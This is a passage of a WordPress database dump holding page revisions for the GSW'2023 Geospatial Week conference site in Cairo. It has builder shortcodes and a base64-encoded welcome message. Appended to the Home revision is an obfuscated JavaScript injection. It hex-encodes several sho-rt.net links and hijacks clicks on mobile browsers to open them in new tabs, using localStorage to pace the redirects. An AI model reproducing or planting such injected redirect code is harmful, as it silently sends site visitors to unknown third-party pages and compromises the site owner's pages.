Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQSUyMGp1c3RpZnklM0IlMjIlM0VBcyUyMHdlJTIwY2VsZWJyYXRlJTIwb3VyJTIwNTB0aCUyMGFubml2ZXJzYXJ5JTJDJTIwdGhlJTIwQXJhYiUyMEFjYWRlbXklMjBmb3IlMjBTY2llbmNlJTJDJTIwVGVjaG5vbG9neSUyQyUyMGFuZCUyME1hcml0aW1lJTIwVHJhbnNwb3J0JTIwJTI4QUFTVE1UJTI5JTIwaXMlMjBob25vcmVkJTIwdG8lMjBob3N0JTIwdGhlJTIwSVNQUlMlMjBmaXJzdCUyMEdlb3NwYXRpYWwlMjBXZWVrJTIwaW4lMjBBZnJpY2ElMjBhbmQlMjBNaWRkbGUlMjBFYXN0JTIwaW4lMjAyMDIzJTIwJTI4R1NXLTIwMjMlMjklMjB0aGF0JTIwd2lsbCUyMGJlJTIwaGVsZCUyMHVuZGVyJTIwdGhlJTIwYXVzcGljZXMlMjBvZiUyMEguRSUyMFNlY3JldGFyeS1HZW5lcmFsJTIwb2YlMjB0aGUlMjBMZWFndWUlMjBvZiUyMEFyYWIlMjBTdGF0ZXMuJTIwVGhlJTIwY29uZmVyZW5jZSUyMHdpbGwlMjBiZSUyMGhlbGQlMjBpbiUyMFNlcHRlbWJlciUyMDIwMjMlMkMlMjBhdCUyMHRoZSUyMEludGVyQ29udGluZW50YWwlMjBDYWlybyUyMENpdHklMjBzdGFycyUyMENhaXJvJTJDJTIwRWd5cHQuJTIwQUFTVE1UJTIwc3Ryb25nbHklMjBiZWxpZXZlcyUyMHRoYXQlMjBzY2llbmNlJTIwaXMlMjB0aGUlMjBrZXklMjB0byUyMHRoZSUyMGZ1dHVyZSUyMGFuZCUyMHRoZSUyMGNvcm5lcnN0b25lJTIwZm9yJTIwbmF0aW9ucyUyNyUyMHByb2dyZXNzJTIwYW5kJTIwcHJvc3Blcml0eS4lMjBJdCUyMGlzJTIwdGhlJTIwcHJpbWFyeSUyMGZhY3RvciUyMGZvciUyMGh1bWFuJTIwYWNoaWV2ZW1lbnRzJTIwdGhyb3VnaG91dCUyMGFsbCUyMGFnZXMuJTIwQUFTVE1UJTIwaGFzJTIwYSUyMGhvc3QlMjBvZiUyMHF1YWxpZmllZCUyMHByb2Zlc3NvcnMlMjBhbmQlMjBleHBlcnRzJTIwd2hvJTIwYXJlJTIwY2FwYWJsZSUyMG9mJTIwc3VwcG9ydGluZyUyMEFyYWIlMjBhbmQlMjBBZnJpY2FuJTIwY291bnRyaWVzJTIwaW4lMjB2YXJpb3VzJTIwc2NpZW50aWZpYyUyMGZpZWxkcy4lMjBUaGUlMjBHU1clMjB3aWxsJTIwcHJvdmlkZSUyMGElMjBwbGF0Zm9ybSUyMGZvciUyMGludGVybmF0aW9uYWwlMjBzY2hvbGFycyUyQyUyMGdyYWR1YXRlJTIwc3R1ZGVudHMlMkMlMjBmdXR1cmUlMjBzY2llbnRpc3RzJTIwYW5kJTIwaW5kdXN0cmlhbCUyMHNlY3RvcnMlMjB0byUyMGxlYXJuJTIwZXhjaGFuZ2UlMjBrbm93bGVkZ2UlMjBhbmQlMjBleHBlcmllbmNlcyUyMG9mJTIwYXBwbHlpbmclMjBnZW9zcGF0aWFsJTIwdGVjaG5vbG9naWVzJTIwZm9yJTIwc3VzdGFpbmFibGUlMjBkZXZlbG9wbWVudCUyMGZvciUyMGJldHRlciUyMHF1YWxpdHklMjBvZiUyMGxpZmUlMjBmb3IlMjBwZW9wbGUlMjBhcm91bmQlMjB0aGUlMjB3b3JsZC4lMjBXZSUyMHdvdWxkJTIwbGlrZSUyMHRvJTIwdGFrZSUyMHRoaXMlMjBvcHBvcnR1bml0eSUyMHRvJTIwd2VsY29tZSUyMHlvdSUyMHRvJTIwQ2Fpcm8lMjBhJTIwdmlicmFudCUyQyUyMGV4aGlsYXJhdGluZyUyQyUyMGV4b3RpYyUyQyUyMGZhc2NpbmF0aW5nJTIwYW5kJTIwd2VsY29taW5nJTIwY2l0eS4lMjBIb21lJTIwdG8lMjB0aGUlMjBiZXN0JTIwUGhhcmFvbmljJTJDJTIwQ29wdGljJTIwYW5kJTIwSXNsYW1pYyUyMHNpZ2h0cyUyMGluJTIwRWd5cHQuJTIwQ2Fpcm8lMjBpcyUyMHdoZXJlJTIweW91JTIwbmV2ZXIlMjBrbm93JTIwd2hhdCUyMGluY3JlZGlibGUlMkMlMjBoYWxmLWZvcmdvdHRlbiUyMG1vbnVtZW50JTIweW91JTIwbWlnaHQlMjBzdHVtYmxlJTIwYWNyb3NzJTIwd2hpbGUlMjB3YW5kZXJpbmclMjBhcm91bmQuJTIwRW5qb3klMjB0aGUlMjBOaWxlJTIwdmlldyUyQyUyMHZpc2l0JTIwdGhlJTIwZ3JlYXQlMjBweXJhbWlkcyUyMG9mJTIwR2l6YSUyQyUyMHdhbGslMjB0aHJvdWdoJTIwdGhlJTIwY2FwaXRhbCUyN3MlMjBtZWRpZXZhbCUyMG1hcmtldHMlMjBieSUyMEtoYW4lMjBFbC1LaGFsaWxpJTJDJTIwb3IlMjB3YWxrJTIwZG93biUyMHRoZSUyME5pbGUlMjBwcm9tZW5hZGUuJTIwV2UlMjBsb29rJTIwZm9yd2FyZCUyMHRvJTIwd29ya2luZyUyMHdpdGglMjB0aGUlMjBJU1BSUyUyMGNvdW5jaWwlMkMlMjBjb21taXNzaW9ucyUyMHByZXNpZGVudHMlMkMlMjB3b3JraW5nJTIwZ3JvdXAlMjBvZmZpY2VycyUyQyUyMGFuZCUyMG90aGVyJTIwc2lzdGVyJTIwb3JnYW5pemF0aW9ucyUyMHRvJTIwaGF2ZSUyMGElMjBzdWNjZXNzZnVsJTIwdGVjaG5pY2FsJTIwcHJvZ3JhbSUyMGFuZCUyMGElMjBtZW1vcmFibGUlMjBzb2NpYWwlMjBwcm9ncmFtLiUyMEl0JTIwaXMlMjBncmVhdCUyMHRvJTIwaGF2ZSUyMHRoZSUyMEdTVyUyMGNvbWluZyUyMHRvJTIwRWd5cHQlMjB3aGVyZSUyMG1vc3QlMjBwcm9iYWJseSUyMHRoZSUyMGZpcnN0JTIwbWFwcGluZyUyMHN5c3RlbXMlMjB3ZXJlJTIwZGV2ZWxvcGVkJTIwMTAwMHMlMjB5ZWFycyUyMGFnby4lMjBXZWxjb21lJTIwdG8lMjBHU1clMjcyMDIzJTIwaW4lMjBDYWlybyUyQyUyMEVneXB0LiUzQyUyRnAlM0U=[/vc_raw_html][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQSUyMGp1c3RpZnklM0IlMjIlM0VBcyUyMHdlJTIwY2VsZWJyYXRlJTIwb3VyJTIwNTB0aCUyMGFubml2ZXJzYXJ5JTJDJTIwdGhlJTIwQXJhYiUyMEFjYWRlbXklMjBmb3IlMjBTY2llbmNlJTJDJTIwVGVjaG5vbG9neSUyQyUyMGFuZCUyME1hcml0aW1lJTIwVHJhbnNwb3J0JTIwJTI4QUFTVE1UJTI5JTIwaXMlMjBob25vcmVkJTIwdG8lMjBob3N0JTIwdGhlJTIwSVNQUlMlMjBmaXJzdCUyMEdlb3NwYXRpYWwlMjBXZWVrJTIwaW4lMjBBZnJpY2ElMjBhbmQlMjBNaWRkbGUlMjBFYXN0JTIwaW4lMjAyMDIzJTIwJTI4R1NXLTIwMjMlMjklMjB0aGF0JTIwd2lsbCUyMGJlJTIwaGVsZCUyMHVuZGVyJTIwdGhlJTIwYXVzcGljZXMlMjBvZiUyMEguRSUyMFNlY3JldGFyeS1HZW5lcmFsJTIwb2YlMjB0aGUlMjBMZWFndWUlMjBvZiUyMEFyYWIlMjBTdGF0ZXMuJTIwVGhlJTIwY29uZmVyZW5jZSUyMHdpbGwlMjBiZSUyMGhlbGQlMjBpbiUyMFNlcHRlbWJlciUyMDIwMjMlMkMlMjBhdCUyMHRoZSUyMEludGVyQ29udGluZW50YWwlMjBDYWlybyUyMENpdHklMjBzdGFycyUyMENhaXJvJTJDJTIwRWd5cHQuJTIwQUFTVE1UJTIwc3Ryb25nbHklMjBiZWxpZXZlcyUyMHRoYXQlMjBzY2llbmNlJTIwaXMlMjB0aGUlMjBrZXklMjB0byUyMHRoZSUyMGZ1dHVyZSUyMGFuZCUyMHRoZSUyMGNvcm5lcnN0b25lJTIwZm9yJTIwbmF0aW9ucyUyNyUyMHByb2dyZXNzJTIwYW5kJTIwcHJvc3Blcml0eS4lMjBJdCUyMGlzJTIwdGhlJTIwcHJpbWFyeSUyMGZhY3RvciUyMGZvciUyMGh1bWFuJTIwYWNoaWV2ZW1lbnRzJTIwdGhyb3VnaG91dCUyMGFsbCUyMGFnZXMuJTIwQUFTVE1UJTIwaGFzJTIwYSUyMGhvc3QlMjBvZiUyMHF1YWxpZmllZCUyMHByb2Zlc3NvcnMlMjBhbmQlMjBleHBlcnRzJTIwd2hvJTIwYXJlJTIwY2FwYWJsZSUyMG9mJTIwc3VwcG9ydGluZyUyMEFyYWIlMjBhbmQlMjBBZnJpY2FuJTIwY291bnRyaWVzJTIwaW4lMjB2YXJpb3VzJTIwc2NpZW50aWZpYyUyMGZpZWxkcy4lMjBUaGUlMjBHU1clMjB3aWxsJTIwcHJvdmlkZSUyMGElMjBwbGF0Zm9ybSUyMGZvciUyMGludGVybmF0aW9uYWwlMjBzY2hvbGFycyUyQyUyMGdyYWR1YXRlJTIwc3R1ZGVudHMlMkMlMjBmdXR1cmUlMjBzY2llbnRpc3RzJTIwYW5kJTIwaW5kdXN0cmlhbCUyMHNlY3RvcnMlMjB0byUyMGxlYXJuJTIwZXhjaGFuZ2UlMjBrbm93bGVkZ2UlMjBhbmQlMjBleHBlcmllbmNlcyUyMG9mJTIwYXBwbHlpbmclMjBnZW9zcGF0aWFsJTIwdGVjaG5vbG9naWVzJTIwZm9yJTIwc3VzdGFpbmFibGUlMjBkZXZlbG9wbWVudCUyMGZvciUyMGJldHRlciUyMHF1YWxpdHklMjBvZiUyMGxpZmUlMjBmb3IlMjBwZW9wbGUlMjBhcm91bmQlMjB0aGUlMjB3b3JsZC4lMjBXZSUyMHdvdWxkJTIwbGlrZSUyMHRvJTIwdGFrZSUyMHRoaXMlMjBvcHBvcnR1bml0eSUyMHRvJTIwd2VsY29tZSUyMHlvdSUyMHRvJTIwQ2Fpcm8lMjBhJTIwdmlicmFudCUyQyUyMGV4aGlsYXJhdGluZyUyQyUyMGV4b3RpYyUyQyUyMGZhc2NpbmF0aW5nJTIwYW5kJTIwd2VsY29taW5nJTIwY2l0eS4lMjBIb21lJTIwdG8lMjB0aGUlMjBiZXN0JTIwUGhhcmFvbmljJTJDJTIwQ29wdGljJTIwYW5kJTIwSXNsYW1pYyUyMHNpZ2h0cyUyMGluJTIwRWd5cHQuJTIwQ2Fpcm8lMjBpcyUyMHdoZXJlJTIweW91JTIwbmV2ZXIlMjBrbm93JTIwd2hhdCUyMGluY3JlZGlibGUlMkMlMjBoYWxmLWZvcmdvdHRlbiUyMG1vbnVtZW50JTIweW91JTIwbWlnaHQlMjBzdHVtYmxlJTIwYWNyb3NzJTIwd2hpbGUlMjB3YW5kZXJpbmclMjBhcm91bmQuJTIwRW5qb3klMjB0aGUlMjBOaWxlJTIwdmlldyUyQyUyMHZpc2l0JTIwdGhlJTIwZ3JlYXQlMjBweXJhbWlkcyUyMG9mJTIwR2l6YSUyQyUyMHdhbGslMjB0aHJvdWdoJTIwdGhlJTIwY2FwaXRhbCUyN3MlMjBtZWRpZXZhbCUyMG1hcmtldHMlMjBieSUyMEtoYW4lMjBFbC1LaGFsaWxpJTJDJTIwb3IlMjB3YWxrJTIwZG93biUyMHRoZSUyME5pbGUlMjBwcm9tZW5hZGUuJTIwV2UlMjBsb29rJTIwZm9yd2FyZCUyMHRvJTIwd29ya2luZyUyMHdpdGglMjB0aGUlMjBJU1BSUyUyMGNvdW5jaWwlMkMlMjBjb21taXNzaW9ucyUyMHByZXNpZGVudHMlMkMlMjB3b3JraW5nJTIwZ3JvdXAlMjBvZmZpY2VycyUyQyUyMGFuZCUyMG90aGVyJTIwc2lzdGVyJTIwb3JnYW5pemF0aW9ucyUyMHRvJTIwaGF2ZSUyMGElMjBzdWNjZXNzZnVsJTIwdGVjaG5pY2FsJTIwcHJvZ3JhbSUyMGFuZCUyMGElMjBtZW1vcmFibGUlMjBzb2NpYWwlMjBwcm9ncmFtLiUyMEl0JTIwaXMlMjBncmVhdCUyMHRvJTIwaGF2ZSUyMHRoZSUyMEdTVyUyMGNvbWluZyUyMHRvJTIwRWd5cHQlMjB3aGVyZSUyMG1vc3QlMjBwcm9iYWJseSUyMHRoZSUyMGZpcnN0JTIwbWFwcGluZyUyMHN5c3RlbXMlMjB3ZXJlJTIwZGV2ZWxvcGVkJTIwMTAwMHMlMjB5ZWFycyUyMGFnby4lMjBXZWxjb21lJTIwdG8lMjBHU1clMjcyMDIzJTIwaW4lMjBDYWlybyUyQyUyMEVneXB0LiUzQyUyRnAlM0U=[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 17:58:32','2022-10-05 17:58:32','',2167,'https://gsw2023.com/?p=2295',0,'revision','',0),
(2296,1,'2022-10-05 17:59:57','2022-10-05 17:59:57','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" 